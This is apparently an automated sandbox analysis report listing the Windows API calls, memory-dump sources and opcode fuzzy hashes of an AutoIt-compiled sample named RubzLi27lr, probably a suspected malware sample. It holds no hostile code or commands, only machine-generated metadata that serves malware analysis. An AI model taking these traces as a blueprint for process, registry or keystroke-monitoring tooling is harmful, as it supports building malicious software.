• Opcode Fuzzy Hash: c4657fa840b04385ba7206ea63ed9678d9dad964e7a0d7580c62de3fcedd3a75
• Instruction Fuzzy Hash: 8CE0E53A206101BBDB415FA9ED0C90ABF39FF4AF22B108220F22592070CF329520DF50
APIs
  • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B1C6EE
• _wcslen.LIBCMT ref: 00B1C735
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B1C79C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B1C7CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0
• API String ID: 1227352736-4108050209
• Opcode ID: c245e8c4211f0017600b37b321a8493cc43076065a99aa74cd2746a62efd1d01
• Instruction ID: ee0c9748a277a205301010ae7bdca604a8cd024d040cc46d7bf9258fc6f440db
• Opcode Fuzzy Hash: c245e8c4211f0017600b37b321a8493cc43076065a99aa74cd2746a62efd1d01
• Instruction Fuzzy Hash: C551DF716853009BD7119F28C885BEA7BE8EF49310F440AADF9A5D31E1DBA0DD84CB52
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00B3AEA3
  • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
• GetProcessId.KERNEL32(00000000), ref: 00B3AF38
• CloseHandle.KERNEL32(00000000), ref: 00B3AF67
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
• Opcode ID: 9507188e001efc387f04b2ae2a23a46c4f3abceffdda8b35ef95252b8174ba7a
• Instruction ID: 6d96da2aa5b4a6d89989ac39a7fdaaed19d3590e101d89e845de1473f5e2a7a3
• Opcode Fuzzy Hash: 9507188e001efc387f04b2ae2a23a46c4f3abceffdda8b35ef95252b8174ba7a
• Instruction Fuzzy Hash: 98719B70A00215DFCB14EF64C585A9EBBF4FF08310F248499E856AB7A2CB74ED45CB91
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B17206
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B1723C
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B1724D
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B172CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 982882428716e48986bd4022f0d529183482700f78c11cf0b912393fe79cd2fd
• Instruction ID: d8fe2093ddff224fea67a46f37b731e8a3236b62ad23d8cab5f1d049f32a8c62
• Opcode Fuzzy Hash: 982882428716e48986bd4022f0d529183482700f78c11cf0b912393fe79cd2fd
• Instruction Fuzzy Hash: 30412D71644204AFDB15CF54C884ADA7BF9EF4A710F5480E9BD09DF20ADBB1DA85CBA0
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B43E35
                                                                                                                  • IsMenu.USER32(?), ref: 00B43E4A
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B43E92
                                                                                                                  • DrawMenuBar.USER32 ref: 00B43EA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                  • String ID: 0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B11E66
                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B11E79
                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B11EA9
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B42F8D
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00B42F94
                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B42FA9
                                                                                                                  • DestroyWindow.USER32(?), ref: 00B42FB1
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                  • String ID: SysAnimate32
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AD4D1E,00AE28E9,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002), ref: 00AD4D8D
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AD4DA0
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AD4D1E,00AE28E9,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002,00000000), ref: 00AD4DC3
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00B0D3AD
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B0D3BF
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B0D3E5
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E9C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB4EAE
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EC0
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E62
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4E74
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E87
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00B3A427
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B3A435
                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B3A468
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B3A63D
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B53700), ref: 00AEBB91
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B8121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00AEBC09
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B81270,000000FF,?,0000003F,00000000,?), ref: 00AEBC36
                                                                                                                  • _free.LIBCMT ref: 00AEBB7F
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AEBD4B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1286116820-0
                                                                                                                  • Opcode ID: 3661b6a58e44878d270034e40af3ef1a70f4ed6c5caf438adc6cc79c6b2d0400
                                                                                                                  • Instruction ID: 806e7dd7708516e85e07924fd95915b81d215dd26082d7d621101dcb8457ee45
                                                                                                                  • Opcode Fuzzy Hash: 3661b6a58e44878d270034e40af3ef1a70f4ed6c5caf438adc6cc79c6b2d0400
                                                                                                                  • Instruction Fuzzy Hash: 0B51F971914249EFCB10EF6A9D899AFB7BCEF84310F10066AE554D71A1EF309E41CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B1CF22,?), ref: 00B1DDFD
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B1CF22,?), ref: 00B1DE16
                                                                                                                    • Part of subcall function 00B1E199: GetFileAttributesW.KERNEL32(?,00B1CF95), ref: 00B1E19A
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00B1E473
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00B1E4AC
                                                                                                                  • _wcslen.LIBCMT ref: 00B1E5EB
                                                                                                                  • _wcslen.LIBCMT ref: 00B1E603
                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B1E650
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3183298772-0
                                                                                                                  • Opcode ID: aa1479815e09dd1f128df9503f18ddb82c7d45c3d396cc61dfbed362671a8771
                                                                                                                  • Instruction ID: fbbe6445221b2711924fece1dbe08490f0b58885cd833eed6c14ebe6afef491d
                                                                                                                  • Opcode Fuzzy Hash: aa1479815e09dd1f128df9503f18ddb82c7d45c3d396cc61dfbed362671a8771
                                                                                                                  • Instruction Fuzzy Hash: 095180B24083459BC724DBA0DC819DF77ECEF85340F40496EFA99D3151EE74E6888766
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3BAA5
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B3BB00
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B3BB63
                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00B3BBA6
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3BBB3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 826366716-0
                                                                                                                  • Opcode ID: 9414acc169790f3811b991c8da77f0fac5b38ccd3a1727146975758be8d050ad
                                                                                                                  • Instruction ID: 471ae1a0d9bd646edada2e4ef330597bd5b356cfca31602452ae8681998781d4
                                                                                                                  • Opcode Fuzzy Hash: 9414acc169790f3811b991c8da77f0fac5b38ccd3a1727146975758be8d050ad
                                                                                                                  • Instruction Fuzzy Hash: 1F619031208241AFD314DF14C491E6ABBE9FF84308F24859DF59A8B2A2DF31ED45CB92
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B18BCD
                                                                                                                  • VariantClear.OLEAUT32 ref: 00B18C3E
                                                                                                                  • VariantClear.OLEAUT32 ref: 00B18C9D
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B18D10
                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B18D3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4136290138-0
                                                                                                                  • Opcode ID: 31675d710da3feaeafdb466b02288c29efa06925c392b5c0b23666490d01dbfe
                                                                                                                  • Instruction ID: ac3ca75ff42eca7271eb7728d8d5b16ee80822a46889dc7b9c8e1f1860a6f74a
                                                                                                                  • Opcode Fuzzy Hash: 31675d710da3feaeafdb466b02288c29efa06925c392b5c0b23666490d01dbfe
                                                                                                                  • Instruction Fuzzy Hash: BD516CB5A00219EFCB10CF68D894AAAB7F5FF89310B158569F905DB350EB30E911CF90
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B28BAE
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B28BDA
                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B28C32
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B28C57
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B28C5F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2832842796-0
                                                                                                                  • Opcode ID: 03b40bff858ad15718bdbc73cd8051bbee2bdd2277b0d278a359bbb727d7378f
                                                                                                                  • Instruction ID: 325b42dc024b65bf3bea97e24e7cae9c227df01f3be4e7c090baa8c11d392a47
                                                                                                                  • Opcode Fuzzy Hash: 03b40bff858ad15718bdbc73cd8051bbee2bdd2277b0d278a359bbb727d7378f
                                                                                                                  • Instruction Fuzzy Hash: E1516F35A002149FCB11DF64C981EADBBF5FF49314F088498E84AAB362CB75ED41DBA0
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B38F40
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B38FD0
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B38FEC
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B39032
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B39052
                                                                                                                    • Part of subcall function 00ACF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B21043,?,7644E610), ref: 00ACF6E6
                                                                                                                    • Part of subcall function 00ACF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B0FA64,00000000,00000000,?,?,00B21043,?,7644E610,?,00B0FA64), ref: 00ACF70D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 666041331-0
                                                                                                                  • Opcode ID: fc6dc12a60cbb472c9fb9282a89eca47496085fc564e97465717d8d0400d8e51
                                                                                                                  • Instruction ID: bb717dcdc3f830215a4a71bbb50d9f880ba591ad4bf6efbec88e394a336713f1
                                                                                                                  • Opcode Fuzzy Hash: fc6dc12a60cbb472c9fb9282a89eca47496085fc564e97465717d8d0400d8e51
                                                                                                                  • Instruction Fuzzy Hash: A2514838605205DFCB15DF68C5848ADBBF5FF49314F1481A8E80AAB362DB71ED86CB91
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B46C33
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00B46C4A
                                                                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B46C73
                                                                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B2AB79,00000000,00000000), ref: 00B46C98
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B46CC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3688381893-0
                                                                                                                  • Opcode ID: 68721b652190dc860e7d05aca8115457ca604720e49e612cfe472d60f35c434b
                                                                                                                  • Instruction ID: e7252b4c071ad75085fd5085cf9864c53dcb3c337a02f96f83581c2357d87ccf
                                                                                                                  • Opcode Fuzzy Hash: 68721b652190dc860e7d05aca8115457ca604720e49e612cfe472d60f35c434b
                                                                                                                  • Instruction Fuzzy Hash: 0941B335A04104AFD724CF68CC95FA97BE5EB0B350F1502A8F895A72E2C771AF41EA41
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: e9f02c006c75732142b6dd88c7b040afceffed1783e0bcce27bba60b1e734218
                                                                                                                  • Instruction ID: faafe580994150cdc59fde5b36e692fe9ccd66ff44dd03a38db2efc08c63444d
                                                                                                                  • Opcode Fuzzy Hash: e9f02c006c75732142b6dd88c7b040afceffed1783e0bcce27bba60b1e734218
                                                                                                                  • Instruction Fuzzy Hash: C141D232A002449FCB24DF79C981B5DB7B9EF89314F15456DE515EB392DA31AE01CB80
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00AC9141
                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00AC915E
                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00AC9183
                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00AC919D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
